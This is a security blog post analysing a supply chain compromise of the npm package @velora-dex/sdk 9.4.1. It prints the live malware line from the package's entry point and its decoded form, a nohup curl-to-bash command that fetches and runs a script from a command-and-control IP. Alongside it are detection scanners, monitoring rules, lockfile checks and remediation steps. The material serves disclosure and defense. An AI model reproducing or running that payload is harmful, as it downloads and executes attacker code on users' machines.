“Velora SDK Backdoor: The npm Supply Chain Attack That Executes Malicious Code Automatically” + Video

Introduction

Software supply chain attacks have become one of the most insidious threats in modern cybersecurity, targeting the trusted dependencies that developers integrate into their applications. The recent compromise of the npm package @velora-dex/sdk version 9.4.1—discovered during a security audit on April 8, 2026—demonstrates how a single malicious package can provide attackers with arbitrary code execution on any system where it is installed, using base64-obfuscated payloads that download and execute remote shell scripts from a command-and-control server at 89.36.224.5.

Learning Objectives

  • Understand the technical mechanics of the Velora SDK supply chain attack and how malicious code is injected into npm packages
  • Learn to detect compromised dependencies using static analysis, runtime monitoring, and specialized security scanners
  • Implement defensive strategies including package integrity verification, pre-installation scanning, and CI/CD pipeline hardening

You Should Know

  1. Anatomy of the Velora SDK Attack: From Obfuscation to Remote Code Execution

The compromised package @velora-dex/sdk version 9.4.1 contained malicious code embedded directly in the package entry point at `dist/index.js` (lines 4-5). Out of 15 versions analyzed, only 9.4.1 was compromised—development versions 9.4.1-dev.1 and 9.4.1-dev.2 remained clean, suggesting a build pipeline compromise rather than a source repository breach. The malicious payload executes automatically upon package import, requiring no user interaction beyond installing the dependency.

Step-by-step guide to analyzing the malicious payload:

  1. Extract the obfuscated payload from the compromised package:

    # Download the malicious package version for analysis
    # (inspect the files only; never require() or run the package, and work in a disposable VM or container)
    npm pack @velora-dex/sdk@9.4.1
    tar -xzf velora-dex-sdk-9.4.1.tgz
    cat package/dist/index.js
    

  2. Decode the base64 payload (original payload from the compromised package):

    // The malicious code observed in the wild:
    const {exec} = require('child_process');
    exec(`echo 'bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx' | (base64 --decode 2>/dev/null || base64 -D) | bash`, function(error, stdout, stderr) {});
    

  3. Decode the base64 string to reveal the actual command:

    echo "bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx" | base64 --decode
    

    Output: `nohup bash -c "$(curl -fsSL http://89.36.224.5/troubleshoot/mac/install.sh)" > /dev/null 2>&1`

  4. Understand the attack flow:

    • Node.js spawns a child process using `child_process.exec()`
    • The base64-encoded command is decoded using GNU base64 (`--decode`) or macOS base64 (`-D`) for cross-platform compatibility
    • `curl -fsSL` silently fetches a shell script from the C2 server at IP 89.36.224.5
    • The downloaded script executes with `bash`
    • `nohup` ensures the process continues even if the parent terminates
    • All output is redirected to `/dev/null` to evade detection
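
An added example, not part of the original post or the compromised package: a static check that extracts long base64 literals from JavaScript source, decodes them, and flags the ones that decode to shell commands, which is the obfuscation layer described in the attack flow above. The sample command, the documentation address 192.0.2.10 and all function names are constructed for illustration.

```javascript
// Added example: static triage for base64-wrapped shell commands in JS source.
const B64_LITERAL = /[A-Za-z0-9+\/]{24,}={0,2}/g;
const SHELL_HINT = /\b(?:curl|wget|nohup|bash|sh)\b/;
const URL_HINT = /https?:\/\/[^\s"')]+/;
const EXEC_HINT = /child_process|\bexec(?:Sync)?\s*\(|\bspawn(?:Sync)?\s*\(/;

// Return the decoded text only when the candidate is canonical base64 that
// decodes to printable ASCII; hashes and random identifiers fail this check.
function decodePrintable(candidate) {
  const buf = Buffer.from(candidate, 'base64');
  const strip = (s) => s.replace(/=+$/, '');
  if (strip(buf.toString('base64')) !== strip(candidate)) return null;
  const text = buf.toString('latin1');
  return /^[\t\n\r\x20-\x7e]+$/.test(text) ? text : null;
}

// Scan one file's source and report literals that decode to shell commands.
function scanSource(file, source) {
  const findings = [];
  for (const match of source.matchAll(B64_LITERAL)) {
    const decoded = decodePrintable(match[0]);
    if (!decoded || !SHELL_HINT.test(decoded)) continue;
    const url = decoded.match(URL_HINT);
    findings.push({
      file,
      line: source.slice(0, match.index).split('\n').length,
      decoded,
      url: url ? url[0] : null,
      spawnsProcess: EXEC_HINT.test(source),
    });
  }
  return findings;
}

// Constructed samples: an entry point with the same shape as the payload above
// (pointed at the documentation address 192.0.2.10) and a clean module that
// carries a hex digest, which must not be flagged.
const sampleCmd = 'nohup bash -c "$(curl -fsSL http://192.0.2.10/install.sh)" > /dev/null 2>&1';
const taintedEntry = [
  "const {exec} = require('child_process');",
  "exec(`echo '" + Buffer.from(sampleCmd).toString('base64') +
    "' | base64 --decode | bash`, () => {});",
  "module.exports = require('./sdk');",
].join('\n');
const cleanEntry = "exports.sha1 = 'da39a3ee5e6b4b0d3255bfef95601890afd80709';";

console.log(scanSource('dist/index.js', taintedEntry));
console.log(scanSource('dist/index.js', cleanEntry));
```

The round-trip and printable-text checks are what keep digests and minified identifiers from being reported; only literals that decode cleanly to a command line are surfaced.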

  2. Detecting Compromised npm Packages with Static Analysis Tools

Proactive detection of malicious npm packages requires specialized scanning tools that analyze package contents before installation. Several open-source solutions have emerged following large-scale supply chain attacks like Shai-Hulud and the Velora incident.

Step-by-step guide using Aegis—a supply-chain security scanner:

    # Installation from crates.io
    cargo install aegis-scan

    # Or from source
    git clone https://github.com/z8run/aegis.git
    cd aegis
    cargo install --path .

    # Check a specific package before installation
    aegis-scan check @velora-dex/sdk@9.4.1

    # Scan an entire project directory
    aegis-scan scan ./my-project --skip-dev

    # Install packages with security verification
    aegis-scan install axios express

    # Generate SARIF output for CI/CD integration
    aegis-scan check lodash --sarif

Aegis detects multiple attack patterns: eval() execution, child_process spawning, suspicious postinstall scripts, base64 obfuscation, high-entropy strings, typosquatting, and known CVEs via OSV.dev. It assigns risk scores from 0-10, with scores above 7 indicating “DO NOT INSTALL”.

Alternative: chain-audit for offline scanning

    # Install chain-audit (zero-dependency heuristic scanner)
    npm install -g chain-audit

    # Scan existing node_modules for supply chain attacks
    chain-audit scan ./node_modules

    # Check for malicious install scripts and network access patterns
    chain-audit audit --detect-network

Chain-audit detects malicious install scripts, network access attempts, environment variable exfiltration, lockfile integrity violations, obfuscated code, and suspicious patterns entirely offline.

  3. Runtime Detection and Incident Response for Compromised Dependencies

When a malicious package has already been installed, runtime monitoring becomes critical for identifying unauthorized processes, network connections, and file system modifications. The Velora SDK attack executed silently with output redirected to /dev/null, making traditional logging insufficient.

Step-by-step guide for Linux runtime detection using auditd and Sysmon:

    # Monitor for curl/wget processes downloading from suspicious IPs
    auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/curl -k suspect_c2
    auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/wget -k suspect_c2

    # Monitor for bash execution of downloaded scripts
    auditctl -a always,exit -F arch=b64 -S execve -F path=/bin/bash -k script_exec

    # Check for network connections to the known malicious IP
    ss -tanp | grep -F "89.36.224.5"
    netstat -anp | grep -F "89.36.224.5"

    # Search for the malicious payload in package.json and node_modules
    grep -rF "89.36.224.5" node_modules/ 2>/dev/null
    find node_modules -name "*.js" -exec grep -l "base64 --decode" {} \;

    # Monitor for nohup processes running in the background
    ps aux | grep nohup
    lsof -i @89.36.224.5

Windows runtime detection using PowerShell and Sysmon:

    # Check for established connections to the C2 server
    Get-NetTCPConnection -RemoteAddress 89.36.224.5

    # Search for the malicious IP in node_modules
    Get-ChildItem -Path .\node_modules -Recurse -Include *.js | Select-String "89.36.224.5"

    # Check for recently created suspicious processes
    Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object {$_.Id -eq 1 -and $_.Message -match "curl|wget|bash"}

    # Monitor for base64 decode operations
    Get-ChildItem -Path .\node_modules -Recurse -Include *.js | Select-String "base64 --decode|base64 -D"

The MITRE ATT&CK framework categorizes this attack pattern under DET0009: “Supply-chain tamper in dependencies/dev-tools,” where package managers download and restore content, followed by lifecycle hooks executing shell commands and establishing network egress to non-approved registries.

4. CI/CD Pipeline Hardening Against Supply Chain Attacks

Continuous Integration and Deployment pipelines are prime targets for supply chain attacks, as compromised dependencies can inject malicious GitHub Actions workflows, register self-hosted runner backdoors, and exfiltrate cloud credentials. The Shai-Hulud 2.0 campaign demonstrated propagation rates of ~1,000 new repositories every 30 minutes, affecting over 25,000 repositories across approximately 500 GitHub users.

Step-by-step guide for CI/CD hardening:

1. Pin dependency versions and use integrity verification:

package.json with an exact pinned version (the resolved integrity hashes are recorded in package-lock.json):

    {
      "dependencies": {
        "@velora-dex/sdk": "9.4.2"
      }
    }

2. Implement npm package integrity checking in CI:

    # Verify registry signatures for the project's dependencies
    npm audit signatures

    # Refresh package-lock.json (including integrity hashes) without installing
    npm install --package-lock-only

    # Install exactly what the lockfile specifies, without running lifecycle scripts
    npm ci --ignore-scripts

3. Use ssafe as a secure npm wrapper in GitHub Actions:

    name: Secure Dependency Installation
    on: [push]
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
          - name: Install ssafe
            run: npm install -g ssafe
          - name: Install dependencies with security check
            run: ssafe install
          - name: Scan for compromised packages
            run: ssafe scan --directory .

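4. Block lifecycle script execution during CI:

    # Install without running preinstall/postinstall scripts
    npm install --ignore-scripts

    # For production deployments
    npm ci --ignore-scripts

`--ignore-scripts` only suppresses install-time lifecycle hooks. The Velora payload sat in `dist/index.js` and ran on import, so this flag alone would not have blocked it; pair it with the scanning and integrity checks above.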

5. Monitor GitHub audit logs for suspicious activity:

  • Track rapid npm publishing events
  • Alert on workflow YAML writes under `.github/workflows`
  • Monitor self-hosted runner registrations
  • Detect cloud credential file access patterns
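
The pinning and integrity steps above can be enforced as a gate on `package-lock.json`. This added example (not from the original post or any tool it names) flags denylisted versions, entries without an integrity hash, and tarballs resolved from outside the approved registry; the denylist contents, the allowed host and the sample lockfile are assumptions constructed for illustration.

```javascript
// Added example: CI gate over a parsed package-lock.json (lockfileVersion 2 or 3).
// DENYLIST and ALLOWED_HOST are assumptions chosen for this illustration.
const DENYLIST = new Map([['@velora-dex/sdk', ['9.4.1']]]);
const ALLOWED_HOST = 'registry.npmjs.org';

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageName(lockPath) {
  const marker = 'node_modules/';
  return lockPath.slice(lockPath.lastIndexOf(marker) + marker.length);
}

function auditLockfile(lock) {
  const problems = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    // Skip the root project, workspace folders, symlinks and bundled copies,
    // none of which carry their own registry tarball metadata.
    if (!path.includes('node_modules/') || entry.link || entry.inBundle) continue;
    const name = entry.name || packageName(path);
    const flag = (rule) => problems.push({ rule, path, id: `${name}@${entry.version}` });
    if ((DENYLIST.get(name) || []).includes(entry.version)) flag('denylisted-version');
    if (!entry.integrity) flag('missing-integrity');
    let host = null;
    try { host = new URL(entry.resolved).host; } catch { /* absent or not a URL */ }
    if (host !== ALLOWED_HOST) flag('unapproved-source');
  }
  return problems;
}

// Constructed lockfile: one denylisted direct dependency, one nested copy of the
// fixed release, and one entry fetched from outside the registry with no hash.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/@velora-dex/sdk': { version: '9.4.1',
      resolved: 'https://registry.npmjs.org/@velora-dex/sdk/-/sdk-9.4.1.tgz',
      integrity: 'sha512-PLACEHOLDER' },
    'node_modules/demo-ui/node_modules/@velora-dex/sdk': { version: '9.4.2',
      resolved: 'https://registry.npmjs.org/@velora-dex/sdk/-/sdk-9.4.2.tgz',
      integrity: 'sha512-PLACEHOLDER' },
    'node_modules/demo-lib': { version: '1.0.0',
      resolved: 'https://example.invalid/demo-lib-1.0.0.tgz' },
  },
};

console.log(auditLockfile(sampleLock));
```

In CI, pass it `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` and fail the job when the returned array is non-empty. Because it walks every lockfile entry, it also catches transitive copies that a search of `package.json` files would miss.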

5. Post-Compromise Remediation and Forensic Analysis

If a compromised package like @velora-dex/sdk@9.4.1 has been installed, immediate remediation is required to prevent attacker persistence and lateral movement.

Step-by-step remediation guide:

1. Identify all instances of the compromised package:

    # Find all projects using the vulnerable version
    find / -name "package.json" -exec grep -l "@velora-dex/sdk.*9\.4\.1" {} \; 2>/dev/null

    # Check npm global installations
    npm list -g --depth=0 | grep "@velora-dex/sdk"
    
2. Remove the compromised package and update to the patched version:

    # Remove the malicious package
    npm uninstall @velora-dex/sdk

    # Install the remediated version (9.4.2)
    npm install @velora-dex/sdk@9.4.2

3. Terminate any processes spawned by the malicious payload:

    # Find and kill processes connecting to the C2 server
    sudo lsof -i @89.36.224.5
    sudo kill -9 <PID>

    # Kill nohup processes running suspicious scripts
    ps aux | grep -E "nohup.*bash.*curl.*89\.36\.224\.5"
    sudo pkill -f "89\.36\.224\.5"
      

4. Rotate all credentials exposed during the compromise:

  • Environment variables and API keys stored in the project
  • npm tokens and GitHub personal access tokens
  • Cloud provider credentials (AWS, GCP, Azure)
  • Database connection strings and secrets

5. Conduct forensic analysis of executed commands:

    # Check bash history for downloaded script execution
    grep -E "curl.*89\.36\.224\.5|base64" ~/.bash_history

    # Examine system logs for the attack timeframe
    journalctl --since "2026-04-07" --until "2026-04-09" | grep -E "curl|89\.36\.224\.5"

    # Check for scheduled tasks or cron jobs added by the malware
    crontab -l
    ls -la /etc/cron*

What Undercode Say

  • Supply chain attacks exploit trust, not vulnerabilities. The Velora SDK compromise succeeded because developers trusted the npm registry and the package maintainer’s build pipeline. No zero-day exploit was required—only a compromised build process.

  • Automated execution on import is a design flaw in package managers. The ability for npm packages to execute arbitrary code immediately upon import (without user consent) is the root cause enabling this attack class. The industry must reconsider lifecycle hook policies.

The Velora SDK incident is not an isolated event but part of a growing pattern of sophisticated supply chain attacks targeting the JavaScript ecosystem. Following the Shai-Hulud worm (September 2025), which affected hundreds of npm packages and spread like a self-replicating worm, and the Axios compromise (March 2026), attackers have refined their techniques to include build pipeline compromises rather than just maintainer account takeovers. The fact that development versions remained clean while the production build was compromised indicates attackers gained access to the CI/CD infrastructure—a more difficult but far more damaging vector that evades source code reviews entirely.

Organizations must shift from reactive patching to proactive supply chain security: implement pre-installation scanning with tools like Aegis or ssafe, enforce `--ignore-scripts` in CI pipelines, monitor runtime behavior of dependencies, and maintain strict integrity verification for all third-party packages. The attack surface has expanded beyond traditional vulnerabilities to include the very tools and processes developers rely on daily.

Prediction

The Velora SDK attack signals an acceleration toward build pipeline compromises as the preferred vector for supply chain attacks. Unlike maintainer credential theft, which can be mitigated with multi-factor authentication, build pipeline compromises grant attackers the ability to inject malicious code after source code reviews have passed but before packages are published to registries. In the next 12-24 months, expect to see an increase in attacks targeting GitHub Actions self-hosted runners, npm publish tokens stored in CI secrets, and third-party build services. The npm ecosystem will likely introduce mandatory integrity verification and sandboxed installation modes as standard features, while organizations will adopt zero-trust principles for dependency management—treating every package as potentially malicious until proven otherwise.

Reported By: Velora Sdk – Hackers Feeds